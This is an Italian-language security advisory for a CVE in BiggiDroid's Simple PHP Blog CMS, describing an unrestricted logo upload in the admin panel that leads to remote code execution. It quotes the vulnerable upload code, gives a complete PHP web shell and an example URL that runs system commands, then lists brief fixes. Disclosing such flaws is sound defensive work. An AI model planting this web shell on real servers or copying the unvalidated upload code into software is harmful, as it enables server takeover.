
CVE-2025-15495 - Caricamento arbitrario di file che porta all'esecuzione remota di codice (RCE)
BiggiDroid – Simple PHP Blog CMS Pagina del prodotto: https://biggidroid.com/product/simple-php-blog/
Critica
CVSS (Stimato): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Il Simple PHP Blog CMS contiene una vulnerabilità di caricamento file senza restrizioni nella funzionalità di caricamento del Logo del Sito del pannello di amministrazione. Un attaccante autenticato può caricare un file PHP malevolo travestito da immagine, che viene memorizzato in una directory accessibile dal web ed eseguito dal server, portando all'esecuzione remota di comandi.
Pannello di Amministrazione → Aggiorna Logo del Sito
Estratto di codice vulnerabile rilevante:
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];
$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");
if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
// success
}
Crea un file chiamato shell.php:
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>
shell.php come file logo📌 L'applicazione accetta il file PHP senza validazione
Dopo il caricamento, il file è accessibile all'indirizzo:
http://127.0.0.1/image/shell.php
Esegui comandi di sistema:
http://127.0.0.1/image/shell.php?cmd=dir
Il server esegue comandi del sistema operativo e restituisce l'output, confermando l'Esecuzione Remota di Codice.





Un attaccante può:
Questa vulnerabilità può portare alla completa compromissione del server.
.htaccess / hardening del serverLimitare le estensioni dei file
$allowed = ['jpg','jpeg','png','gif'];
Validare il tipo MIME
finfo_file()
Rinominare i file caricati